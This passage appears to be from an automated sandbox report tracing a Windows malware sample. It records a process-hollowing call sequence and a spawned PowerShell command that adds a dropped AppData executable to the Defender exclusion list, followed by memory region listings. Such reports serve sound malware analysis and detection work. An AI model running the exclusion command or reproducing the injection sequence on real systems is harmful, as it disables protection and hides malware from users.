[290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0188.459] ReadProcessMemory (in: hProcess=0x428, lpBaseAddress=0x35d008, lpBuffer=0x19e9a0, nSize=0x4, lpNumberOfBytesRead=0x19e9e4 | out: lpBuffer=0x19e9a0*, lpNumberOfBytesRead=0x19e9e4*=0x4) returned 1
[0188.462] NtUnmapViewOfSection (ProcessHandle=0x428, BaseAddress=0x400000) returned 0x0
[0188.471] VirtualAllocEx (hProcess=0x428, lpAddress=0x400000, dwSize=0x154000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0188.481] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x400000, lpBuffer=0x3e409e0*, nSize=0x400, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x3e409e0*, lpNumberOfBytesWritten=0x19e9e4*=0x400) returned 1
[0188.537] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x401000, lpBuffer=0x242dd68*, nSize=0x13000, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x242dd68*, lpNumberOfBytesWritten=0x19e9e4*=0x13000) returned 1
[0188.872] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x414000, lpBuffer=0x2441310*, nSize=0x4a00, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x2441310*, lpNumberOfBytesWritten=0x19e9e4*=0x4a00) returned 1
[0189.214] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x419000, lpBuffer=0x2445d1c*, nSize=0x600, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x2445d1c*, lpNumberOfBytesWritten=0x19e9e4*=0x600) returned 1
[0189.480] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x54f000, lpBuffer=0x2446328*, nSize=0x2e00, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x2446328*, lpNumberOfBytesWritten=0x19e9e4*=0x2e00) returned 1
[0189.761] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x552000, lpBuffer=0x2449134*, nSize=0x1000, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x2449134*, lpNumberOfBytesWritten=0x19e9e4*=0x1000) returned 1
[0189.983] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x553000, lpBuffer=0x244a140*, nSize=0x200, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x244a140*, lpNumberOfBytesWritten=0x19e9e4*=0x200) returned 1
[0190.237] WriteProcessMemory (in: hProcess=0x428, lpBaseAddress=0x35d008, lpBuffer=0x244a64c*, nSize=0x4, lpNumberOfBytesWritten=0x19e9e4 | out: lpBuffer=0x244a64c*, lpNumberOfBytesWritten=0x19e9e4*=0x4) returned 1
[0190.272] SetThreadContext (hThread=0x48c, lpContext=0x242d404*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x35d000, Edx=0x0, Ecx=0x0, Eax=0x405ce2, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0190.275] ResumeThread (hThread=0x48c) returned 0x1
[0190.320] CoGetContextToken (in: pToken=0x19ee00 | out: pToken=0x19ee00) returned 0x0
[0190.320] CObjectContext::QueryInterface () returned 0x0
[0190.320] CObjectContext::GetCurrentThreadType () returned 0x0
[0190.320] Release () returned 0x3
[0190.321] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x6a8478*=0x14c, lpdwindex=0x19eca4 | out: lpdwindex=0x19eca4) returned 0x0
Thread:
id = 2
os_tid = 0x13bc
Thread:
id = 3
os_tid = 0x13ec
Thread:
id = 4
os_tid = 0x13f0
[0089.668] CoGetContextToken (in: pToken=0x442fc74 | out: pToken=0x442fc74) returned 0x800401f0
[0089.668] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0089.668] RoInitialize () returned 0x1
[0089.668] RoUninitialize () returned 0x0
[0190.395] SetWindowLongW (hWnd=0x3037c, nIndex=-4, dwNewLong=1944586208) returned 78054886
[0190.396] SetClassLongW (hWnd=0x3037c, nIndex=-24, dwNewLong=1944586208) returned 0x4a705be
[0190.397] PostMessageW (hWnd=0x3037c, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0190.398] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
[0190.398] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", hInstance=0x400000) returned 0
[0190.400] IsWindow (hWnd=0x5033a) returned 1
[0190.403] GetModuleHandleW (lpModuleName="user32.dll") returned 0x743d0000
[0190.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x442fa14, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW\x16mwèÒ'(ú", lpUsedDefaultChar=0x0) returned 14
[0190.403] GetProcAddress (hModule=0x743d0000, lpProcName="DefWindowProcW") returned 0x73e807e0
[0190.403] SetWindowLongW (hWnd=0x5033a, nIndex=-4, dwNewLong=1944586208) returned 78054966
[0190.404] SetClassLongW (hWnd=0x5033a, nIndex=-24, dwNewLong=1944586208) returned 0x4a70636
[0190.404] IsWindow (hWnd=0x5033a) returned 1
[0190.405] DestroyWindow (hWnd=0x5033a) returned 0
[0190.405] PostMessageW (hWnd=0x5033a, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0190.405] SetConsoleCtrlHandler (HandlerRoutine=0x4a7060e, Add=0) returned 1
[0190.405] EtwEventUnregister (RegHandle=0x705230) returned 0x0
[0190.415] DeleteObject (ho=0x180a05de) returned 1
[0190.427] CloseHandle (hObject=0x298) returned 1
[0190.431] DeleteObject (ho=0x290a0685) returned 1
[0190.431] GdipDeleteFont (font=0x4c6efc0) returned 0x0
[0190.432] GdipDeleteFont (font=0x5c7b080) returned 0x0
[0190.433] GetCurrentObject (hdc=0x3701098e, type=0x6) returned 0x310a096d
[0190.433] SelectObject (hdc=0x3701098e, h=0x18a0048) returned 0x310a096d
[0190.434] DeleteObject (ho=0x310a096d) returned 1
[0190.434] DeleteDC (hdc=0x3701098e) returned 1
[0190.435] RestoreDC (hdc=0x0, nSavedDC=-1) returned 0
[0190.436] GdipDeleteFont (font=0x4c61f08) returned 0x0
[0190.437] GdipDisposeImage (image=0x5c7f3b8) returned 0x0
[0190.452] CloseHandle (hObject=0x3d0) returned 1
[0190.452] CloseHandle (hObject=0x3c8) returned 1
[0190.453] CloseHandle (hObject=0x3c4) returned 1
[0190.458] CloseHandle (hObject=0x508) returned 1
[0190.462] CloseHandle (hObject=0x4f4) returned 1
[0190.462] RegCloseKey (hKey=0x80000004) returned 0x0
Thread:
id = 5
os_tid = 0xed4
Thread:
id = 6
os_tid = 0x238
[0125.119] CoGetContextToken (in: pToken=0x799fd0c | out: pToken=0x799fd0c) returned 0x0
[0125.120] CObjectContext::QueryInterface () returned 0x0
[0125.120] CObjectContext::GetCurrentThreadType () returned 0x0
[0125.120] Release () returned 0x0
Thread:
id = 7
os_tid = 0x1080
Thread:
id = 8
os_tid = 0x1078
Thread:
id = 9
os_tid = 0x11c8
Thread:
id = 10
os_tid = 0x11dc
Thread:
id = 11
os_tid = 0x11e8
Thread:
id = 12
os_tid = 0x860
Thread:
id = 96
os_tid = 0x1278
Process:
id = "2"
image_name = "powershell.exe"
filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
page_root = "0x6c160000"
os_pid = "0x1140"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x1394"
cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 547
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 548
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 549
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 550
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 551
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 552
start_va = 0xe0000
end_va = 0xe3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 553
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 554
start_va = 0x100000
end_va = 0x101fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 555
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 556
start_va = 0x10f0000
end_va = 0x1160fff
monitored = 0
entry_point = 0x10f9c00
region_type = mapped_file
name = "powershell.exe"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")
Region:
id = 557
start_va = 0x1170000
end_va = 0x516ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001170000"
filename = ""
Region:
id = 558
start_va = 0x771d0000
end_va = 0x7734afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 559
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 560
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 561
start_va = 0x7fff0000
end_va = 0x7dfa1676ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 562
start_va = 0x7dfa16770000
end_va = 0x7ffa1676ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007dfa16770000"
filename = ""
Region:
id = 563
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 564
start_va = 0x7ffa16931000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffa16931000"
filename = ""
Region:
id = 565
start_va = 0x400000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 566
start_va = 0x640d0000
end_va = 0x6411ffff
monitored = 0
entry_point = 0x640e8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 567
start_va = 0x64050000
end_va = 0x640c9fff
monitored = 0
entry_point = 0x64063290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 568
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 587
start_va = 0x64120000
end_va = 0x64127fff
monitored = 0
entry_point = 0x641217c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 588
start_va = 0x400000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 589
start_va = 0x5f0000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005f0000"
filename = ""
Region:
id = 590
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 591
start_va = 0x76910000
end_va = 0x76a8dfff
monitored = 0
entry_point = 0x769c1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 592
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 593
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 757
start_va = 0x110000
end_va = 0x1cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 758
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 759
start_va = 0x76600000
end_va = 0x7667afff
monitored = 0
entry_point = 0x7661e970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 760
start_va = 0x76a90000
end_va = 0x76b4dfff
monitored = 0
entry_point = 0x76ac5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 761
start_va = 0x400000
end_va = 0x43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 762
start_va = 0x440000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 763
start_va = 0x4d0000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 764
start_va = 0x76cb0000
end_va = 0x76cf3fff
monitored = 0
entry_point = 0x76cc9d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 765
start_va = 0x76c00000
end_va = 0x76cacfff
monitored = 0
entry_point = 0x76c14f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 766
start_va = 0x73f00000
end_va = 0x73f1dfff
monitored = 0
entry_point = 0x73f0b640
region_type = mapped_file
name = "sspicli.dll"
